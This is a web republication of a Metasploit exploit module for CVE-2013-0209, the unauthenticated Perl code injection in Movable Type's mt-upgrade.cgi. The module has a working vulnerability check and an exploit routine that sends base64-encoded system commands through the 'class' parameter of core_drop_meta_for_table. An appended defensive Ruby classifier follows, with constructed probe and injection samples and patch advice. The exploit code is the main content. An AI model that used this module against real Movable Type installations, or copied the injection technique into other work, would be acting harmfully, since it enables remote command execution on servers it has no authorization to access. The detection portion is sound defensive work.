Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution
Source: metasploit.com  Author: Kacper  Published: 2013-01-25

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution',
      'Description'    => %q{
        This module can be used to execute a payload on Movable Type (MT) that
        exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),
        that is used during installation and updating of the platform.
        The vulnerability arises due to the following properties:
        1. This script may be invoked remotely without requiring authentication
        to any MT instance.
        2. Through a crafted POST request, it is possible to invoke particular
        database migration functions (i.e. functions that bring the existing
        database up-to-date with an updated codebase) by name and with
        particular parameters.
        3. A particular migration function, core_drop_meta_for_table, allows
        a class parameter to be set which is used directly in a Perl eval
        statement, allowing Perl code injection.
      },
      'Author'         =>
        [
          'Kacper Nowak',
          'Nick Blundell',
          'Gary O\'Leary-Steele'
        ],
      'References'     =>
        [
          ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
          ['CVE', '2013-0209'],
          ['URL', 'http://www.sec-1.com/blog/?p=402'],
          ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
        ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       =>
        [
          'win',
          'unix'
        ],
      'Targets'        =>
        [
          ['Movable Type 4.2x, 4.3x', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 07 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt'])
      ], self.class)
  end

  # Sends a random alphabetic package name as the "class" argument. A
  # vulnerable install evals it and Perl's error message names that package,
  # which proves the value reached eval without running anything.
  def check
    @peer = "#{rhost}:#{rport}"
    fingerprint = rand_text_alpha(5)
    print_status("#{@peer} - Sending check...")
    begin
      res = http_send_raw(fingerprint)
    rescue Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    if (res)
      # The pattern expects the quotes of Perl's error to arrive
      # backslash-escaped, as they do in the JSON-encoded response.
      if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
        return Exploit::CheckCode::Vulnerable
      elsif (res.code != 200)
        return Exploit::CheckCode::Unknown
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exploit
    @peer = "#{rhost}:#{rport}"
    print_status("#{@peer} - Sending payload...")
    http_send_cmd(payload.encoded)
  end

  # POSTs a single run_actions step to mt-upgrade.cgi with cmd as the "class"
  # argument of core_drop_meta_for_table. Backslashes and double quotes are
  # escaped so the value stays a valid JSON string inside the steps array.
  # (The block form is used for the backslash replacement because a plain
  # '\\\\' replacement string collapses to a single backslash in gsub.)
  def http_send_raw(cmd)
    path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
    pay = cmd.gsub('\\') { '\\\\' }.gsub('"', '\"')
    send_request_cgi(
      {
        'uri'       => path,
        'method'    => 'POST',
        'vars_post' =>
          {
            '__mode'     => 'run_actions',
            'installing' => '1',
            'steps'      => %{[["core_drop_meta_for_table","class","#{pay}"]]}
          }
      })
  end

  # Wraps the command in Perl that base64-decodes and runs it, so the command
  # text itself never needs quoting inside the injected class string.
  def http_send_cmd(cmd)
    pay = 'v0;use MIME::Base64;system(decode_base64(q('
    pay << Rex::Text.encode_base64(cmd)
    pay << ')));return 0'
    http_send_raw(pay)
  end
end
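For the defending side, the request shape above is easy to recognise: a form-encoded POST to mt-upgrade.cgi whose steps JSON calls core_drop_meta_for_table with a "class" value that is not a Perl package name. The Ruby below is an added example, not part of this module or of Metasploit; the sample bodies are constructed, and the assumption that legitimate migrations only name MT:: classes is mine and should be tuned to the site's plugins.

```ruby
require 'json'
require 'uri'

# A Perl package name is word characters joined by '::'. Anything else in the
# "class" argument of core_drop_meta_for_table is not a table class but code
# headed for the eval described above.
PERL_PACKAGE = /\A[A-Za-z_]\w*(::[A-Za-z_]\w*)*\z/
# Assumption: legitimate migrations only drop meta for MT's own classes.
EXPECTED_PREFIX = 'MT::'

# Classify one form-encoded POST body sent to mt-upgrade.cgi.
#   :injection  class is not even a package name (code injection attempt)
#   :probe      a package name MT would never migrate, e.g. the five random
#               letters the check routine above sends
#   :malformed  steps is not a JSON array of [name, key, value, ...] steps
#   :benign     anything else (other modes are not inspected here)
def classify_upgrade_post(body)
  params = URI.decode_www_form(body).to_h
  return :benign unless params['__mode'] == 'run_actions'
  steps = JSON.parse(params.fetch('steps', '[]'))
  raise TypeError unless steps.is_a?(Array)
  steps.each do |step|
    name, *args = Array(step)
    next unless name == 'core_drop_meta_for_table'
    # args arrive as alternating key/value pairs: ["class", "MT::Entry"];
    # an odd count makes Hash[] raise ArgumentError, reported as :malformed.
    cls = Hash[*args]['class'].to_s
    return :injection unless cls.match?(PERL_PACKAGE)
    return :probe unless cls.start_with?(EXPECTED_PREFIX)
  end
  :benign
rescue JSON::ParserError, TypeError, ArgumentError
  :malformed
end

# Constructed sample bodies (not captured traffic). The injection sample
# mimics the "v0;...;return 0" shape the module above sends, with harmless Perl.
def build_body(steps_json)
  URI.encode_www_form('__mode' => 'run_actions', 'installing' => '1',
                      'steps' => steps_json)
end

SAMPLES = {
  legit:     build_body('[["core_drop_meta_for_table","class","MT::Entry"]]'),
  probe:     build_body('[["core_drop_meta_for_table","class","AbCdE"]]'),
  injection: build_body('[["core_drop_meta_for_table","class","v0;print 1;return 0"]]'),
  malformed: build_body('[["core_drop_meta_for_table","class"]]')
}

SAMPLES.each { |label, body| puts "#{label}: #{classify_upgrade_post(body)}" }
```

Syntax checks alone miss the fingerprint probe, which is why the prefix rule exists; the vendor's 4.38 patch referenced above, or removing mt-upgrade.cgi once installation is done, is the actual fix.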
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved